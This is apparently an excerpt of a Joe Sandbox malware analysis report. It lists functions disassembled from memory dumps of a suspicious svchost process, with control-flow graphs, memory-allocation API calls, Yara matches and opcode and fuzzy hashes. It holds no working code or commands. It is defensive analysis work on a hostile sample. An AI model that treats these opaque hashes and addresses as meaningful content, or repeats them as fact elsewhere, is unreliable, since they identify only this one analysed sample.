                                                                                                                                                                                                                                                                                                          Function 00007DF426B6E590 Relevance: 1.4, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f8fbf1e0dace0bbcf886be7d0c5f5cc6114c87acca0995b8cd3d5e33568c21e9
                                                                                                                                                                                                                                                                                                          • Instruction ID: f7ad221934403289e9ca32b4f7ec89eb7d16563e10c7f88437b6b8014bf03402
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8fbf1e0dace0bbcf886be7d0c5f5cc6114c87acca0995b8cd3d5e33568c21e9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08517534A1C8998EEF58EA188884B7A37E1EF54315F14117AD40FCB293D628E883CBC1
                                                                                                                                                                                                                                                                                                          Function 000001C276404F54 Relevance: 1.4, APIs: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 557 1c276404f54-1c276404f86 558 1c2764050b6-1c2764050c9 557->558 559 1c276404f8c-1c276404fa6 call 1c27640940c 557->559 559->558 562 1c276404fac-1c276404faf 559->562 563 1c276404fc1-1c276404fe6 562->563 564 1c276404fb1-1c276404fba 562->564 566 1c276404fe8 563->566 567 1c276404feb-1c276404ffb malloc 563->567 564->562 565 1c276404fbc 564->565 565->558 566->567 567->558 568 1c276405001-1c276405005 567->568 569 1c276405099-1c2764050a0 568->569 570 1c27640500b-1c276405014 568->570 571 1c2764050a2-1c2764050ab 569->571 572 1c2764050ad-1c2764050b0 569->572 573 1c276405018-1c276405036 570->573 571->558 572->558 574 1c2764050b2-1c2764050b3 572->574 575 1c276405038-1c276405048 573->575 576 1c276405091-1c276405092 573->576 574->558 578 1c27640504a-1c276405051 575->578 579 1c276405080-1c27640508f 575->579 576->569 580 1c276405053-1c276405065 578->580 579->573 579->576 581 1c276405067-1c276405069 580->581 582 1c27640506d-1c276405079 580->582 581->582 582->580 583 1c27640507b-1c27640507c 582->583 583->579
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 90cd778a792e42c64db594db91f27ad2126318ab58eecec55435c6b2a2086037
                                                                                                                                                                                                                                                                                                          • Instruction ID: 82632968a24e26a7b7a7076d23d63c53c79927d9c8ff0e38c7670b47e4f3e084
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90cd778a792e42c64db594db91f27ad2126318ab58eecec55435c6b2a2086037
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D417B3115CB284BF73C9A1C9CD6AF973D1E792314F18816ED8C6C2246E971E82786D2
                                                                                                                                                                                                                                                                                                          Function 00007DF426AADA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007DF426ABE150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF426ABC0F7), ref: 00007DF426ABE160
                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00007DF426AADB44
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007DF426AB77EC: malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF426AD740A), ref: 00007DF426AB780B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc$AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1211516610-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                                                                                                                                                                          • Instruction ID: 86aeb8fc8bc87aa015eb3686d551516f94a70e04b85be6237e891ab922c037a9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0414D70508A4C8FDB64EF18D8857A677E5FB69311F10417BD84EC7292DE34E984CB92
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB7598 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 878954f4d421218c3ab92de7bd82bf99854e497deafca62910956d187cf15e40
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C414831608D0E8FDB88EF6CD898AA5B7E1FB78311715467BD40AC3665DB74E8858BC0
                                                                                                                                                                                                                                                                                                          Function 000001C2764050CC Relevance: 1.4, APIs: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 584 1c2764050cc-1c2764050fd 586 1c276405103-1c276405108 584->586 587 1c2764051af-1c2764051b9 584->587 588 1c276405123-1c276405124 586->588 589 1c27640510a-1c276405121 586->589 590 1c276405129-1c27640512f 588->590 589->588 589->589 591 1c27640517b-1c27640517f 590->591 592 1c276405131-1c276405132 590->592 591->590 594 1c276405181-1c276405184 591->594 593 1c276405134-1c276405179 592->593 593->591 593->593 595 1c2764051a6-1c2764051a9 free 594->595 596 1c276405186-1c276405192 594->596 595->587 597 1c276405194-1c2764051a4 596->597 597->595 597->597
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 121c78d1b2291ac724d62adec3f01ff2ea2d670a96f5b98f5ad1c622ad2bd052
                                                                                                                                                                                                                                                                                                          • Instruction ID: f2d60e909dcd8d4eed75f3e12ef46b6282516f2331933e491045006d9e228fda
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 121c78d1b2291ac724d62adec3f01ff2ea2d670a96f5b98f5ad1c622ad2bd052
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD313E30A58E6807F73D4B3C1AAE7F17BC1E7DA321F18419DD899C6293DC55C8574241
                                                                                                                                                                                                                                                                                                          Function 00007DF426B6EA54 Relevance: 1.4, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                                                                                                                                                                                                          • Instruction ID: d53cae078d0d4f6768d2cd96224596e13890a728ada8f50a2ad24ac76e376da5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E41C670908A188EDB91DF1894887D57AE1FB68711F1842BBDC4DCF25ADB749885CBA0
                                                                                                                                                                                                                                                                                                          Function 000001C27640C440 Relevance: 1.4, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45755ac3fc1b299357fa248614e5cf9831b05787f0c9c72564af89a9d49d463
                                                                                                                                                                                                                                                                                                          • Instruction ID: 89f027cdd07fd09192a4f4355cf1f1e665e422148495f9128315f5e791a6bb14
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45755ac3fc1b299357fa248614e5cf9831b05787f0c9c72564af89a9d49d463
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31A530218E198FFBA8EF69D494FB173E1FB68301F1141A9D84EC32A6DA74D851CB80
                                                                                                                                                                                                                                                                                                          Function 000001C276406024 Relevance: 1.4, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 24982d73c66e1a4d078db24c6322379e549b9d86f2eea88fe5e7b398dafb8cc5
                                                                                                                                                                                                                                                                                                          • Instruction ID: e2131e70d0f2ec2f9703f9fcd7839bb9f158981b0883e566dc42fad58cfd03b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24982d73c66e1a4d078db24c6322379e549b9d86f2eea88fe5e7b398dafb8cc5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C416D31508B488FEB55EF28C4D4BE5B7E1FBA8300F4445B9E88ACB246DB74D541CB51
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB77EC Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF426AD740A), ref: 00007DF426AB780B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                                                                                                                                                                                                          • Instruction ID: 48772fde1f238968f9b509c89daa1da632ff9c072013c7a47af785368e77d733
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E821C331614D0C8FDB48EF1CD88CBA177E5EB6931170441B7D80ACB255DA24E884CB90
                                                                                                                                                                                                                                                                                                          Function 000001C276403BC8 Relevance: 1.3, APIs: 1, Instructions: 90stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c6a7c236d73697e4ca57ed050e55d544e6cacc2476fd745c83e7f6659eda1179
                                                                                                                                                                                                                                                                                                          • Instruction ID: 50ba1cce33de0e7fb0117927871470df6fea9ea4238e424ba334dff338b9f6dd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6a7c236d73697e4ca57ed050e55d544e6cacc2476fd745c83e7f6659eda1179
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2021BB31754E194FFBB9E778EDA9BE636D6E7A4304F4441A5D007C21BAEE78C8118740
                                                                                                                                                                                                                                                                                                          Function 00007DF426AAE560 Relevance: 1.3, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 24d45a3551a768b3090c567df57a9186389bc8119604ba08ac45f82736c76157
                                                                                                                                                                                                                                                                                                          • Instruction ID: f3d09c37acbd27df5b4825fab60e3260ccf42654f16987b4bd9e23f1113f99fc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24d45a3551a768b3090c567df57a9186389bc8119604ba08ac45f82736c76157
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21D230618B084FEB48EF58D8899B677E4FB99321B04427FE44AC3261EA74A841C7C1
                                                                                                                                                                                                                                                                                                          Function 00007DF426A968B8 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF426A96946), ref: 00007DF426A968FD
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
                                                                                                                                                                                                                                                                                                          • Instruction ID: 015cf91c3aaa41a55cbb4d50226fe9b86401dbf729cc379232e29bc64c7b7aff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1001AD30A09A465BF3689F6DD888322A6E1FF99325F24423AD409C3280DB38E880C780
                                                                                                                                                                                                                                                                                                          Function 00007DF426A9272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d85b136148b19596b08c22c0249dc1ddd04b65b2101eb081a4e13fe19aee1f2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F016230A29D0A8BDB98DF6C9C8462632E1FB59325764813ED00ED72D0D629D8428745
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB778C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 89be67091896b1da07f700886e1e4d9fcad1effbef51436963846972d87fbccb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a12f3eaa25d99da9a64c5afba0aa3122de0250f0afaccbd66e945b367312ad5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89be67091896b1da07f700886e1e4d9fcad1effbef51436963846972d87fbccb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F09A30215E0A8FEB88EF29C8D8B22B3E4FB69315F60007AD41AC3290D7B9D894C750
                                                                                                                                                                                                                                                                                                          Function 000001C276401B7C Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 675 1c276401b7c-1c276401b9a 677 1c276401bcc 675->677 678 1c276401b9c-1c276401bbc calloc 675->678 681 1c276401bce-1c276401bd4 677->681 679 1c276401bc3-1c276401bc4 678->679 680 1c276401bbe-1c276401bc1 678->680 679->677 680->681
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 418f43b1e00efb7115a884b72c32553d8d6b497a6a4eddd5ee5fb9b938cd136f
                                                                                                                                                                                                                                                                                                          • Instruction ID: dfdb01bffe821cddf9f97347e90dec47345f565e1c85451fc6efac31b983993a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 418f43b1e00efb7115a884b72c32553d8d6b497a6a4eddd5ee5fb9b938cd136f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F05E30224A094FF7A5AB289898B6536E4EBA8301F5440769819C72A0EF78CC958700
                                                                                                                                                                                                                                                                                                          Function 00007DF426AF3A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                                                                                                                                                                          • Instruction ID: a8ebf5eacfd11b50c423842969987f4e2ad5b44c1266a88d97fff293cc636fb0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0F43465B94ACBFF58B76698A823577E0EF14312B04003FE80BC15A0CB6E95549766
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC0FC4 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 926087f8737ea9f230ca05f2264e59f4c59066cce98378a11f580aa09d9a84c5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D05E50B16D0D0FAB58A27E1C8912A31D5DBD81327484177B80DC2251EC19CC8582A0
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB7740 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                                                                                                                                                                                                          • Instruction ID: be4404b2bfaa0adbbf9e993e1fa40be2a7f85f6df42c8d88a1198aa7bbefaa10
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E0EC3091595A8FEF89EB788D48BA632E4FB29314F940479C40AC72D4E6BDD984C781
